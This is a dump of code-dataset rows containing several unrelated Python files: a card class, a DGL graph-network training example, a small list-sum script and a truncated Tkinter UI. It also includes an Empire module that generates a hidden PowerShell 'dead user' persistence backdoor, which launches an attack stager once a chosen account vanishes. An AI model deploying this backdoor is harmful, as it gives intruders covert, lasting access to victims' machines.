hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
72b3507469d3268751b2af14a56a3c99059f5d73 | 1,307 | py | Python | deck_of_cards/core.py | ucsky/deck_of_cards | 81422a35857645f434e231e42c78bd5f44f7e0e1 | [
"Apache-2.0"
] | null | null | null | deck_of_cards/core.py | ucsky/deck_of_cards | 81422a35857645f434e231e42c78bd5f44f7e0e1 | [
"Apache-2.0"
] | null | null | null | deck_of_cards/core.py | ucsky/deck_of_cards | 81422a35857645f434e231e42c78bd5f44f7e0e1 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: 00_core.ipynb (unless otherwise specified).
from __future__ import print_function, division
__all__ = ['Card']
# Cell
#nbdev_comment from __future__ import print_function, division
import random
class Card:
    """Represents a standard playing card.

    Attributes:
      suit: integer 0-3 (index into ``suit_names``)
      rank: integer 1-13 (index into ``rank_names``; 1 is the Ace)
    """

    suit_names = ["Clubs", "Diamonds", "Hearts", "Spades"]
    rank_names = [None, "Ace", "2", "3", "4", "5", "6", "7",
                  "8", "9", "10", "Jack", "Queen", "King"]

    def __init__(self, suit=0, rank=2):
        self.suit = suit
        self.rank = rank

    def __str__(self):
        """Returns a human-readable string representation."""
        return '%s of %s' % (Card.rank_names[self.rank],
                             Card.suit_names[self.suit])

    def __eq__(self, other) -> bool:
        """Checks whether self and other have the same rank and suit.
        """
        return self.suit == other.suit and self.rank == other.rank

    def __hash__(self) -> int:
        """Hash consistent with __eq__ so cards can be used in sets and as
        dict keys.  (Defining __eq__ alone makes instances unhashable in
        Python 3.)
        """
        return hash((self.suit, self.rank))

    def __lt__(self, other) -> bool:
        """Compares this card to other, first by suit, then rank.
        """
        t1 = self.suit, self.rank
        t2 = other.suit, other.rank
        return t1 < t2

    def __repr__(self): return self.__str__()
def foo():
    """No-op placeholder exported by the notebook cell; intentionally does nothing."""
    pass
| 25.627451 | 87 | 0.58684 |
114c7c24830f29f02cf0b618677a8c2bd20a28a2 | 11,452 | py | Python | examples/pytorch/sampling/gcn_cv_sc.py | sufeidechabei/dgl-1 | 23f78c0539bdda55722d425be90ac460fa9a6983 | [
"Apache-2.0"
] | null | null | null | examples/pytorch/sampling/gcn_cv_sc.py | sufeidechabei/dgl-1 | 23f78c0539bdda55722d425be90ac460fa9a6983 | [
"Apache-2.0"
] | null | null | null | examples/pytorch/sampling/gcn_cv_sc.py | sufeidechabei/dgl-1 | 23f78c0539bdda55722d425be90ac460fa9a6983 | [
"Apache-2.0"
] | null | null | null | import argparse, time, math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import dgl
import dgl.function as fn
from dgl import DGLGraph
from dgl.data import register_data_args, load_data
class NodeUpdate(nn.Module):
    """Per-layer node update: linear transform + optional activation.

    In training mode (test=False) it adds the pre-aggregated history term
    (control variate); in test mode it applies the degree normalization
    instead.  Reads/writes fields of a DGL NodeFlow layer's node batch.
    """
    def __init__(self, layer_id, in_feats, out_feats, dropout, activation=None, test=False, concat=False):
        super(NodeUpdate, self).__init__()
        self.layer_id = layer_id
        self.linear = nn.Linear(in_feats, out_feats)
        self.dropout = None
        if dropout != 0:
            self.dropout = nn.Dropout(p=dropout)
        self.activation = activation
        self.concat = concat  # if True, output is [h, activation(h)] (skip connection)
        self.test = test

    def forward(self, node):
        h = node.data['h']
        if self.test:
            # inference path: plain normalized aggregation
            norm = node.data['norm']
            h = h * norm
        else:
            # training path: add the aggregated history of the previous layer
            agg_history_str = 'agg_h_{}'.format(self.layer_id-1)
            agg_history = node.data[agg_history_str]
            # control variate
            h = h + agg_history
            if self.dropout:
                h = self.dropout(h)
        h = self.linear(h)
        if self.concat:
            h = torch.cat((h, self.activation(h)), dim=1)
        elif self.activation:
            h = self.activation(h)
        return {'activation': h}
class GCNSampling(nn.Module):
    """GCN trained with neighbor sampling and control-variate history terms.

    Each layer keeps a per-node history ('h_i') stored on the parent graph;
    the forward pass subtracts the stale history and refreshes it.
    """
    def __init__(self,
                 in_feats,
                 n_hidden,
                 n_classes,
                 n_layers,
                 activation,
                 dropout):
        super(GCNSampling, self).__init__()
        self.n_layers = n_layers
        self.dropout = None
        if dropout != 0:
            self.dropout = nn.Dropout(p=dropout)
        self.activation = activation
        # input layer
        self.linear = nn.Linear(in_feats, n_hidden)
        self.layers = nn.ModuleList()
        # hidden layers
        for i in range(1, n_layers):
            skip_start = (i == n_layers-1)  # last hidden layer concatenates (skip)
            self.layers.append(NodeUpdate(i, n_hidden, n_hidden, dropout, activation, concat=skip_start))
        # output layer: input is 2*n_hidden because of the concatenation above
        self.layers.append(NodeUpdate(n_layers, 2*n_hidden, n_classes, dropout))

    def forward(self, nf):
        # 'preprocess' holds the pre-aggregated, normalized raw features
        h = nf.layers[0].data['preprocess']
        if self.dropout:
            h = self.dropout(h)
        h = self.linear(h)

        skip_start = (0 == self.n_layers-1)
        if skip_start:
            h = torch.cat((h, self.activation(h)), dim=1)
        else:
            h = self.activation(h)

        for i, layer in enumerate(self.layers):
            new_history = h.clone().detach()
            history_str = 'h_{}'.format(i)
            history = nf.layers[i].data[history_str]
            # subtract the stale history; the aggregated history is added
            # back inside NodeUpdate (control-variate estimator)
            h = h - history

            nf.layers[i].data['h'] = h
            nf.block_compute(i,
                             fn.copy_src(src='h', out='m'),
                             lambda node : {'h': node.mailbox['m'].mean(dim=1)},
                             layer)
            h = nf.layers[i+1].data.pop('activation')
            # update history
            if i < nf.num_layers-1:
                nf.layers[i].data[history_str] = new_history

        return h
class GCNInfer(nn.Module):
    """Inference-time GCN: same weights layout as GCNSampling but aggregates
    over full neighborhoods (NodeUpdate is built with test=True, dropout 0)."""
    def __init__(self,
                 in_feats,
                 n_hidden,
                 n_classes,
                 n_layers,
                 activation):
        super(GCNInfer, self).__init__()
        self.n_layers = n_layers
        self.activation = activation
        # input layer
        self.linear = nn.Linear(in_feats, n_hidden)
        self.layers = nn.ModuleList()
        # hidden layers
        for i in range(1, n_layers):
            skip_start = (i == n_layers-1)
            # test=True -> apply degree norm instead of history terms
            self.layers.append(NodeUpdate(i, n_hidden, n_hidden, 0, activation, True, concat=skip_start))
        # output layer (2*n_hidden input because of the skip concatenation)
        self.layers.append(NodeUpdate(n_layers, 2*n_hidden, n_classes, 0, None, True))

    def forward(self, nf):
        h = nf.layers[0].data['preprocess']
        h = self.linear(h)

        skip_start = (0 == self.n_layers-1)
        if skip_start:
            h = torch.cat((h, self.activation(h)), dim=1)
        else:
            h = self.activation(h)

        for i, layer in enumerate(self.layers):
            nf.layers[i].data['h'] = h
            # full-neighborhood sum aggregation; norm applied in NodeUpdate
            nf.block_compute(i,
                             fn.copy_src(src='h', out='m'),
                             fn.sum(msg='m', out='h'),
                             layer)
            h = nf.layers[i+1].data.pop('activation')

        return h
def main(args):
    """Train the sampled GCN with control variates and evaluate each epoch."""
    # load and preprocess dataset
    data = load_data(args)

    if args.self_loop and not args.dataset.startswith('reddit'):
        # add a self-edge per node (the reddit dataset already has them)
        data.graph.add_edges_from([(i,i) for i in range(len(data.graph))])

    train_nid = np.nonzero(data.train_mask)[0].astype(np.int64)
    test_nid = np.nonzero(data.test_mask)[0].astype(np.int64)

    features = torch.FloatTensor(data.features)
    labels = torch.LongTensor(data.labels)
    train_mask = torch.ByteTensor(data.train_mask)
    val_mask = torch.ByteTensor(data.val_mask)
    test_mask = torch.ByteTensor(data.test_mask)
    in_feats = features.shape[1]
    n_classes = data.num_labels
    n_edges = data.graph.number_of_edges()

    n_train_samples = train_mask.sum().item()
    n_val_samples = val_mask.sum().item()
    n_test_samples = test_mask.sum().item()

    print("""----Data statistics------'
      #Edges %d
      #Classes %d
      #Train samples %d
      #Val samples %d
      #Test samples %d""" %
          (n_edges, n_classes,
           n_train_samples,
           n_val_samples,
           n_test_samples))

    # create GCN model
    g = DGLGraph(data.graph, readonly=True)
    norm = 1. / g.in_degrees().float().unsqueeze(1)

    if args.gpu < 0:
        cuda = False
    else:
        cuda = True
        torch.cuda.set_device(args.gpu)
        features = features.cuda()
        labels = labels.cuda()
        train_mask = train_mask.cuda()
        val_mask = val_mask.cuda()
        test_mask = test_mask.cuda()
        norm = norm.cuda()

    g.ndata['features'] = features

    num_neighbors = args.num_neighbors
    n_layers = args.n_layers

    g.ndata['norm'] = norm

    # precompute the normalized first-hop aggregation of the raw features
    g.update_all(fn.copy_src(src='features', out='m'),
                 fn.sum(msg='m', out='preprocess'),
                 lambda node : {'preprocess': node.data['preprocess'] * node.data['norm']})

    # per-layer history buffers for the control-variate estimator
    for i in range(n_layers):
        g.ndata['h_{}'.format(i)] = torch.zeros(features.shape[0], args.n_hidden).to(device=features.device)

    # last hidden layer uses the skip concatenation, so it is twice as wide
    g.ndata['h_{}'.format(n_layers-1)] = torch.zeros(features.shape[0], 2*args.n_hidden).to(device=features.device)

    model = GCNSampling(in_feats,
                        args.n_hidden,
                        n_classes,
                        n_layers,
                        F.relu,
                        args.dropout)

    loss_fcn = nn.CrossEntropyLoss()

    infer_model = GCNInfer(in_feats,
                           args.n_hidden,
                           n_classes,
                           n_layers,
                           F.relu)

    if cuda:
        model.cuda()
        infer_model.cuda()

    # use optimizer
    optimizer = torch.optim.Adam(model.parameters(),
                                 lr=args.lr,
                                 weight_decay=args.weight_decay)

    for epoch in range(args.n_epochs):
        for nf in dgl.contrib.sampling.NeighborSampler(g, args.batch_size,
                                                       num_neighbors,
                                                       neighbor_type='in',
                                                       shuffle=True,
                                                       num_hops=n_layers,
                                                       seed_nodes=train_nid):
            # aggregate stored histories of the sampled nodes' neighbors
            for i in range(n_layers):
                agg_history_str = 'agg_h_{}'.format(i)
                g.pull(nf.layer_parent_nid(i+1).long(), fn.copy_src(src='h_{}'.format(i), out='m'),
                       fn.sum(msg='m', out=agg_history_str),
                       lambda node : {agg_history_str: node.data[agg_history_str] * node.data['norm']})

            # copy the fields each NodeFlow layer needs from the parent graph
            node_embed_names = [['preprocess', 'h_0']]
            for i in range(1, n_layers):
                node_embed_names.append(['h_{}'.format(i), 'agg_h_{}'.format(i-1)])
            node_embed_names.append(['agg_h_{}'.format(n_layers-1)])
            nf.copy_from_parent(node_embed_names=node_embed_names)

            model.train()
            # forward
            pred = model(nf)
            batch_nids = nf.layer_parent_nid(-1).to(device=pred.device).long()
            batch_labels = labels[batch_nids]
            loss = loss_fcn(pred, batch_labels)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()

            # write the refreshed per-layer histories back to the parent graph
            node_embed_names = [['h_{}'.format(i)] for i in range(n_layers)]
            node_embed_names.append([])
            nf.copy_to_parent(node_embed_names=node_embed_names)

        # mirror the trained weights into the full-neighborhood inference model
        for infer_param, param in zip(infer_model.parameters(), model.parameters()):
            infer_param.data.copy_(param.data)

        num_acc = 0.

        for nf in dgl.contrib.sampling.NeighborSampler(g, args.test_batch_size,
                                                       g.number_of_nodes(),
                                                       neighbor_type='in',
                                                       num_hops=n_layers,
                                                       seed_nodes=test_nid):
            node_embed_names = [['preprocess']]
            for i in range(n_layers):
                node_embed_names.append(['norm'])
            nf.copy_from_parent(node_embed_names=node_embed_names)

            infer_model.eval()
            with torch.no_grad():
                pred = infer_model(nf)
                batch_nids = nf.layer_parent_nid(-1).to(device=pred.device).long()
                batch_labels = labels[batch_nids]
                num_acc += (pred.argmax(dim=1) == batch_labels).sum().cpu().item()

        print("Test Accuracy {:.4f}". format(num_acc/n_test_samples))
if __name__ == '__main__':
    # Command-line interface: dataset options plus GCN hyper-parameters.
    parser = argparse.ArgumentParser(description='GCN')
    register_data_args(parser)
    parser.add_argument("--dropout", type=float, default=0.5,
                        help="dropout probability")
    parser.add_argument("--gpu", type=int, default=-1,
                        help="gpu")
    parser.add_argument("--lr", type=float, default=3e-2,
                        help="learning rate")
    parser.add_argument("--n-epochs", type=int, default=200,
                        help="number of training epochs")
    parser.add_argument("--batch-size", type=int, default=1000,
                        help="train batch size")
    parser.add_argument("--test-batch-size", type=int, default=1000,
                        help="test batch size")
    parser.add_argument("--num-neighbors", type=int, default=2,
                        help="number of neighbors to be sampled")
    parser.add_argument("--n-hidden", type=int, default=16,
                        help="number of hidden gcn units")
    parser.add_argument("--n-layers", type=int, default=1,
                        help="number of hidden gcn layers")
    parser.add_argument("--self-loop", action='store_true',
                        help="graph self-loop (default=False)")
    parser.add_argument("--weight-decay", type=float, default=5e-4,
                        help="Weight for L2 loss")
    args = parser.parse_args()

    print(args)

    main(args)
| 35.345679 | 115 | 0.541303 |
037e685fe70b3653c2c5f34ef28259bf1a3421d1 | 6,473 | py | Python | lib/modules/persistence/powerbreach/deaduser.py | dascannibal/Empire | 293f06437520f4747e82e4486938b1a9074d3d51 | [
"BSD-3-Clause"
] | 10 | 2016-01-26T19:58:49.000Z | 2021-06-20T17:57:43.000Z | lib/modules/persistence/powerbreach/deaduser.py | dascannibal/Empire | 293f06437520f4747e82e4486938b1a9074d3d51 | [
"BSD-3-Clause"
] | null | null | null | lib/modules/persistence/powerbreach/deaduser.py | dascannibal/Empire | 293f06437520f4747e82e4486938b1a9074d3d51 | [
"BSD-3-Clause"
] | 5 | 2017-10-17T08:16:13.000Z | 2021-04-30T02:41:02.000Z | import os
from lib.common import helpers
class Module:
    """Empire persistence module: PowerBreach 'dead user' backdoor.

    Generates a PowerShell script that polls for the absence of a given user
    account and, once the account disappears, launches an Empire stager.
    NOTE: this file is Python 2 code (print statements, dict.iteritems).
    """

    def __init__(self, mainMenu, params=[]):
        # NOTE(review): mutable default argument for `params`; left unchanged
        # in this documentation-only pass — it is only iterated, never mutated.

        # Module metadata consumed by the Empire framework UI.
        self.info = {
            'Name': 'Invoke-DeadUserBackdoor',

            'Author': ['@sixdub'],

            'Description': ('Backup backdoor for a backdoor user.'),

            'Background' : False,

            'OutputExtension' : None,

            'NeedsAdmin' : False,

            'OpsecSafe' : True,

            'MinPSVersion' : '2',

            'Comments': [
                'http://sixdub.net'
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Listener' : {
                'Description'   :   'Listener to use.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'OutFile' : {
                'Description'   :   'Output the backdoor to a file instead of tasking to an agent.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'Timeout' : {
                'Description'   :   'Time (in seconds) to run the backdoor. Defaults to 0 (run forever).',
                'Required'      :   True,
                'Value'         :   '0'
            },
            'Sleep' : {
                'Description'   :   'Time (in seconds) to sleep between checks.',
                'Required'      :   True,
                'Value'         :   '30'
            },
            'Username' : {
                'Description'   :   'User account to check for existence.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Domain' : {
                'Description'   :   'Switch. Check the current domain for the user account.',
                'Required'      :   False,
                'Value'         :   ''
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # apply any option overrides supplied by the caller
        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self):
        """Build and return the launcher command string for the backdoor.

        Returns '' on error, writes the raw script to OutFile when set, and
        otherwise wraps the script in a Start-Process powershell launcher.
        """
        # PowerShell payload template; REPLACE_LAUNCHER is substituted below.
        script = """
function Invoke-DeadUserBackdoor
{
    Param(
    [Parameter(Mandatory=$False,Position=1)]
    [int]$Timeout=0,
    [Parameter(Mandatory=$False,Position=2)]
    [int] $Sleep=30,
    [Parameter(Mandatory=$True,Position=3)]
    [string] $Username,
    [Parameter(Mandatory=$False,Position=4)]
    [switch] $Domain
    )

    $running=$True
    $match =""
    $starttime = Get-Date
    while($running)
    {
        if ($Timeout -ne 0 -and ($([DateTime]::Now) -gt $starttime.addseconds($Timeout)))
        {
            $running=$False
        }

        if($Domain)
        {
            $UserSearcher = [adsisearcher]"(&(samAccountType=805306368)(samAccountName=*$UserName*))"
            $UserSearcher.PageSize = 1000
            $count = @($UserSearcher.FindAll()).Count
            if($count -eq 0)
            {
                Write-Verbose "Domain user $Username not found!"
                $match=$True
            }
        }
        else
        {
            $comp = $env:computername
            [ADSI]$server="WinNT://$comp"
            $usercheck = $server.children | where{$_.schemaclassname -eq "user" -and $_.name -eq $Username}
            if(-not $usercheck)
            {
                $match=$True
            }
        }

        if($match)
        {
            REPLACE_LAUNCHER
            $running=$False
        }
        else
        {
            Start-Sleep -s $Sleep
        }
    }
}
Invoke-DeadUserBackdoor"""

        listenerName = self.options['Listener']['Value']

        if not self.mainMenu.listeners.is_listener_valid(listenerName):
            # not a valid listener, return nothing for the script
            print helpers.color("[!] Invalid listener: " + listenerName)
            return ""
        else:
            # set the listener value for the launcher
            stager = self.mainMenu.stagers.stagers["launcher"]
            stager.options['Listener']['Value'] = listenerName
            stager.options['Base64']['Value'] = "False"

            # and generate the code
            stagerCode = stager.generate()

            if stagerCode == "":
                return ""
            else:
                script = script.replace("REPLACE_LAUNCHER", stagerCode)
                script = script.encode('ascii', 'ignore')

        # append the remaining module options as PowerShell arguments
        for option,values in self.options.iteritems():
            if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
                if values['Value'] and values['Value'] != '':
                    if values['Value'].lower() == "true":
                        # if we're just adding a switch
                        script += " -" + str(option)
                    else:
                        script += " -" + str(option) + " " + str(values['Value'])

        outFile = self.options['OutFile']['Value']
        if outFile != '':
            # make the base directory if it doesn't exist
            if not os.path.exists(os.path.dirname(outFile)) and os.path.dirname(outFile) != '':
                os.makedirs(os.path.dirname(outFile))

            f = open(outFile, 'w')
            f.write(script)
            f.close()

            print helpers.color("[+] PowerBreach deaduser backdoor written to " + outFile)
            return ""

        # transform the backdoor into something launched by powershell.exe
        # so it survives the agent exiting
        launcher = helpers.powershell_launcher(script)
        stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
        parts = stagerCode.split(" ")

        # set up the start-process command so no new windows appears
        scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:]))
        return scriptLauncher
9d822d9c2b3fe9614729c55d6d1d0045041fb1cb | 100 | py | Python | punto_4.py | mbeltra89001/algoritmos | fef4ec9a2bd9fc6fb1cbd554287136c30445637e | [
"MIT"
] | null | null | null | punto_4.py | mbeltra89001/algoritmos | fef4ec9a2bd9fc6fb1cbd554287136c30445637e | [
"MIT"
] | null | null | null | punto_4.py | mbeltra89001/algoritmos | fef4ec9a2bd9fc6fb1cbd554287136c30445637e | [
"MIT"
] | null | null | null | lista=[]
for i in range (1,13):
t=5*i+1
lista.append(t)
print(lista)
suma=sum(lista)
print(suma) | 14.285714 | 22 | 0.66 |
a2bb2a391751fcf5e7006ac7c504a833b1260fb8 | 30,047 | py | Python | UI/ui.py | PedroKBarros/LE3B | be9740be96871b24ca40ed82109469cdd7204115 | [
"MIT"
] | null | null | null | UI/ui.py | PedroKBarros/LE3B | be9740be96871b24ca40ed82109469cdd7204115 | [
"MIT"
] | 3 | 2021-08-23T20:56:29.000Z | 2021-08-25T16:27:04.000Z | UI/ui.py | PedroKBarros/LE3B | be9740be96871b24ca40ed82109469cdd7204115 | [
"MIT"
] | null | null | null | from tkinter import *
from tkinter.filedialog import askopenfilename
from tkinter import messagebox
from PIL import Image, ImageTk
import UI.ui_constants as ui_consts
import main as main
import os.path
from os import path
from collections import deque
from random import randint
# --- Module-level UI state, shared across callbacks (set in buildUI) ---
root = None                      # Tk root window
currentCommentsUIRow = 0         # presumably the next row index for comment widgets — TODO confirm
commentsFrame = None             # Frame inside cnvComments that holds the comment widgets
lblStatusBar = None              # status-bar Label at the bottom of the window
etrCurrentTime = None            # Entry showing/accepting the current time (HH:MM:SS)
lblTotalTime = None              # Label showing the total time
lblCurrentTimeBar = None         # thin Label overlaid on the time bar as progress marker
lastWidgetFocusIn = None         # str(widget) of the last widget that received focus
btnPlayPause = None              # play/pause Button (its image is swapped with play state)
UICommentsQueue = deque()        # queue of comments waiting to be shown in the UI
cnvComments = None               # scrollable Canvas hosting commentsFrame
scrbarCanvasComment = None       # vertical Scrollbar bound to cnvComments
CkbScrollbarAutoMoveVar = None   # IntVar backing the "auto move to comment" checkbox
def buildUI(root):
    """Build the whole main window: file picker, playback controls, time bar,
    scrollable comments area and status bar.  All widgets are created here and
    the shared module-level references (btnPlayPause, etrCurrentTime, ...) are
    assigned."""
    # Window icon and basic geometry.
    load_image = Image.open("UI/icon.png")
    #load_image = load_image.resize((90, 90), Image.ANTIALIAS)
    render_image = ImageTk.PhotoImage(load_image)
    root.iconphoto(True, render_image)
    root.geometry('338x531')
    root.resizable(False, False)
    root.title(main.getSoftwareName() + " " + main.getSoftwareVersion())
    root["bg"] = ui_consts.DEFAULT_BG_COLOR

    labelFont = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE2)
    entryFont = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE1)
    buttonFont = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE2)
    defaultFgColor = ui_consts.DEFAULT_FG_COLOR
    defaultBgColor = ui_consts.DEFAULT_BG_COLOR

    #fileContainer1 = Frame(master)
    #fileContainer1["bg"] = defaultBgColor
    #fileContainer1.pack()
    #fileContainer1["padx"] = ui_consts.FILE_CONTAINER1_PADX
    #fileContainer1["pady"] = ui_consts.FILE_CONTAINER1_PADY

    #fileContainer2 = Frame(master)
    #fileContainer2["bg"] = defaultBgColor
    #fileContainer2.pack()
    #fileContainer2["padx"] = ui_consts.FILE_CONTAINER2_PADX
    #fileContainer2["pady"] = ui_consts.FILE_CONTAINER2_PADY

    #controlsContainer3 = Frame(master)
    #controlsContainer3["bg"] = ui_consts.CONTROLS_BG_COLOR
    #controlsContainer3.pack()
    #controlsContainer3["padx"] = 170
    #controlsContainer3["pady"] = 2
    #controlsContainer3.grid(row=3, column=0)

    # Caption above the file-path entry.
    label1 = Label(root)
    label1["bg"] = defaultBgColor
    label1["text"] = ui_consts.LABEL1_TEXT
    label1["fg"] = defaultFgColor
    label1["font"] = labelFont
    label1.place(x=15, y=0)

    # Read-only entry that displays the chosen file path.
    entry1 = Entry(root)
    entry1["width"] = 36
    entry1["font"] = entryFont
    entry1["state"] = "readonly" # The state can be disabled, normal or readonly.
                                 # For writing by code or by the user, it must be "normal"
    entry1.place(x=15, y=20)

    # "Open file" button with enter/leave image swap.
    load_image1 = Image.open(ui_consts.IMAGE_PATH_BTN_OPEN_LEAVE)
    load_image1 = load_image1.resize((50, 50), Image.ANTIALIAS) # Resizing the image
    render_image1 = ImageTk.PhotoImage(load_image1)
    button1 = Button(root, image=render_image1)
    button1.image = render_image1
    button1["bd"] = 0 # Set the border, making it minimal
    button1["highlightthickness"] = 0 # Set the highlight thickness, effectively removing the border
    # Mouse Leave and Enter:
    imgData1 = (ui_consts.IMAGE_PATH_BTN_OPEN_ENTER, (50, 50), None, None)
    imgData2 = (ui_consts.IMAGE_PATH_BTN_OPEN_LEAVE, (50, 50), None, None)
    button1.bind("<Enter>", lambda event, wgControl=button1, borderSize=0,
                 borderColor="white", imgData1=imgData1:
                 handleEventMouseEnter(event, wgControl, borderSize, borderColor, imgData1))
    button1.bind("<Leave>", lambda event, wgControl=button1, borderSize=0,
                 borderColor="white", imgData1=imgData2:
                 handleEventMouseLeave(event, wgControl, borderSize, borderColor, imgData1))
    button1.bind("<Button-1>", lambda event, wgControl=button1, borderSize=0,
                 borderColor="white", function=loadCommentsByTxtFile:
                 handleEventMouseLeftClick(event, wgControl, borderSize, borderColor, None, None, function(entry1)))
    button1.place(x=135, y=50)

    # Background strip for the playback controls.
    load_image2 = Image.open(ui_consts.IMAGE_PATH_CONTROLS_BAR)
    load_image2 = load_image2.resize((318, 50), Image.ANTIALIAS) # Resizing the image
    render_image2 = ImageTk.PhotoImage(load_image2)
    label2 = Label(root, image=render_image2)
    label2.image = render_image2
    label2.place(x=0, y=110)

    # Play/pause button; the image shown depends on main.isTimeStatePlay().
    load_image3 = Image.open(ui_consts.IMAGE_PATH_BTN_PLAY_LEAVE)
    load_image3 = load_image3.resize((22, 22), Image.ANTIALIAS) # Resizing the image
    render_image3 = ImageTk.PhotoImage(load_image3)
    global btnPlayPause
    btnPlayPause = Button(root, image=render_image3)
    btnPlayPause.image = render_image3
    btnPlayPause["bd"] = 0 # Set the border, making it minimal
    btnPlayPause["highlightthickness"] = 0 # Set the highlight thickness, effectively removing the border
    # Mouse Leave and Enter:
    # imgData layout: (image path, (width, height), condition function, condition value)
    imgData1 = (ui_consts.IMAGE_PATH_BTN_PLAY_ENTER, (22, 22), main.isTimeStatePlay, False)
    imgData2 = (ui_consts.IMAGE_PATH_BTN_PLAY_LEAVE, (22, 22), main.isTimeStatePlay, False)
    imgData3 = (ui_consts.IMAGE_PATH_BTN_PAUSE_ENTER, (22, 22), main.isTimeStatePlay, True)
    imgData4 = (ui_consts.IMAGE_PATH_BTN_PAUSE_LEAVE, (22, 22), main.isTimeStatePlay, True)
    # Button-1:
    imgData6 = (ui_consts.IMAGE_PATH_BTN_PAUSE_ENTER, (22, 22), main.isTimeStatePlay, False)
    imgData7 = (ui_consts.IMAGE_PATH_BTN_PLAY_ENTER, (22, 22), main.isTimeStatePlay, True)
    btnPlayPause.bind("<Enter>", lambda event, wgControl=btnPlayPause, borderSize=0, borderColor="white",
                      imgData1=imgData1, imgData2=imgData3: handleEventMouseEnter(event, wgControl, borderSize,
                      borderColor, imgData1, imgData2))
    btnPlayPause.bind("<Leave>", lambda event, wgControl=btnPlayPause, borderSize=0, borderColor="white",
                      imgData1=imgData2, imgData2=imgData4: handleEventMouseLeave(event, wgControl, borderSize,
                      borderColor, imgData1, imgData2))
    btnPlayPause.bind("<Button-1>", lambda event, wgControl=btnPlayPause, borderSize=0,
                      borderColor="white", imgData1=imgData6, imgData2=imgData7,
                      function = handleEventPlayPauseButtonMouseLeftClick, execConditionFunc=main.isEndTime, execConditionValue=False:
                      handleEventMouseLeftClick(event, wgControl, borderSize, borderColor,
                      imgData1, imgData2, function, execConditionFunc, execConditionValue))
    btnPlayPause.place(x=7, y=117)

    # Time bar; grows slightly on hover (enter/leave swap its size).
    load_image4 = Image.open(ui_consts.IMAGE_PATH_TIME_BAR)
    load_image4 = load_image4.resize(ui_consts.IMAGE_PATH_TIME_BAR_SIZE_MIN, Image.ANTIALIAS) # Resizing the image
    render_image4 = ImageTk.PhotoImage(load_image4)
    label3 = Label(root, image=render_image4)
    label3.image = render_image4
    label3["bd"] = 0
    label3["highlightthickness"] = 0
    # Mouse Leave and Enter:
    imgData1 = (ui_consts.IMAGE_PATH_TIME_BAR, ui_consts.IMAGE_PATH_TIME_BAR_SIZE_MAX, None, None)
    imgData2 = (ui_consts.IMAGE_PATH_TIME_BAR, ui_consts.IMAGE_PATH_TIME_BAR_SIZE_MIN, None, None)
    label3.bind("<Enter>", lambda event, wgControl=label3, borderSize=0,
                borderColor="white", imgData1=imgData1:
                handleEventMouseEnter(event, wgControl, borderSize, borderColor, imgData1))
    label3.bind("<Leave>", lambda event, wgControl=label3, borderSize=0,
                borderColor="white", imgData1=imgData2:
                handleEventMouseLeave(event, wgControl, borderSize, borderColor, imgData1))
    label3.place(x=10, y=145)

    # Total time label.
    global lblTotalTime
    lblTotalTime = Label(root)
    lblTotalTime["bg"] = ui_consts.SECOND_BG_COLOR
    lblTotalTime["text"] = ui_consts.LABEL4_INITIAL_TEXT
    lblTotalTime["fg"] = ui_consts.SECOND_FG_COLOR
    lblTotalTime["font"] = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE1)
    lblTotalTime.place(x=140, y=118)

    # Editable current-time entry.
    global etrCurrentTime
    var = StringVar()
    var.trace("w", lambda name, index,mode, var=var: handleEtrCurrentTimeChange(var))
    # With the var variable and the trace method we can attach a callback every
    # time the value of etrCurrentTime changes.
    etrCurrentTime = Entry(root, textvariable=var, name=ui_consts.ETR_CURRENT_TIME_NAME) # Named so we can tell whether the FocusIn event was fired by this widget
    etrCurrentTime["width"] = 8
    etrCurrentTime["bg"] = ui_consts.SECOND_BG_COLOR
    etrCurrentTime["fg"] = ui_consts.SECOND_FG_COLOR
    etrCurrentTime["font"] = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE1)
    etrCurrentTime["state"] = "normal"
    etrCurrentTime.bind("<Enter>", lambda event, wgControl=etrCurrentTime, borderSize=0.5,
